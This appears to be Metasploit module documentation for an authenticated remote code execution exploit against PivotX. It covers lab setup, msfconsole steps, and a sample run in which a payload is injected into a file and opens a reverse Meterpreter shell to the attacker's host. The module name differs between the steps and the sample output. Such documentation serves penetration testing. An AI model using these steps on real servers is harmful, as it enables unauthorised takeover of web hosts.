## Vulnerable Application

PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.
It's written in PHP and uses MySQL or flat files as a database.

Install steps:

1. Install Apache2, MySQL, PHP 8.2+
1. `git clone https://github.com/pivotx/PivotX.git`
1. Move `PivotX` to the web folder
1. Run the following from the web folder: `sudo chown -R www-data:www-data ./`

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/pivotx_rce`
1. Do: `set USERNAME [PivotX username]`
1. Do: `set PASSWORD [PivotX password]`
1. Do: `set RHOSTS [target IP]`
1. Do: `set LHOST [attacker IP]`
1. Do: `run`

## Options

### USERNAME

PivotX username.

### PASSWORD

PivotX password.

## Scenarios

```
msf exploit(linux/http/pivotx_index_php_overwrite) > run verbose=true
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3
[*] Logging in PivotX
[*] Modifying file and injecting payload
[*] Triggering payload
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200
[*] Restoring original content

meterpreter >
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
```